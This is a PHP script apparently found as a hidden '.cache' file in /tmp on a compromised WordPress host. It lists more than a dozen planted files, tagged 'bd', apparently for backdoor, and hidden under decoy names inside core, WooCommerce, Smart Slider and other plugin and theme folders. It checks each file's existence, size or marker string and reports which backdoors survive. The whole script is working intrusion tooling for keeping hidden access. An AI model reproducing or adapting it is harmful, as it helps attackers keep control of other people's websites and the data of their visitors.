File: //tmp/.cache
<?php $r = '/home/theparlor/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@5714@@service_registry",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Customers/com_hotproperty.php"=>"bd@@6416@@2199",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Layout/Block/Slide/AddLayer/response.php"=>"bd@@8725@@2330",
"/wp-admin/post-new.php"=>"bd@@11093@@mutex_lock",
"/wp-content/themes/flash/inc/kirki/controls/php/class-kirki-control-dashicons.php"=>"bd@@8138@@initialized",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/StoreApi/Utilities/method.uninstall.php"=>"bd@@6378@@730",
"/wp-content/plugins/woocommerce/packages/woocommerce-blocks/templates/emails/plain/customer.new.account.blocks.php"=>"bd@@6391@@651",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Generator/WordPress/Posts/Elements/about.german3.php"=>"bd@@6211@@1951",
"/wp-content/plugins/smart-slider-3/Nextend/SmartSlider3/Application/Admin/Slides/Template/jpgraph_bar.php"=>"bd@@8798@@935",
"/wp-content/plugins/everest-forms/vendor/scssphp/scssphp/src/Compiler/portfolio.php"=>"bd@@8829@@1586",
"/wp-content/plugins/eventON/includes/integration/zoom/vendor/composer/autoload.real.php"=>"bd@@6272@@660",
"/wp-content/plugins/everest-forms/vendor/themegrill/themegrill-sdk/src/Common/view.blocks.php"=>"bd@@8837@@586",
"/wp-content/themes/custom-file-2-1778672429/assets/js/post_1778672429.php"=>"bd@@5529@@945"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');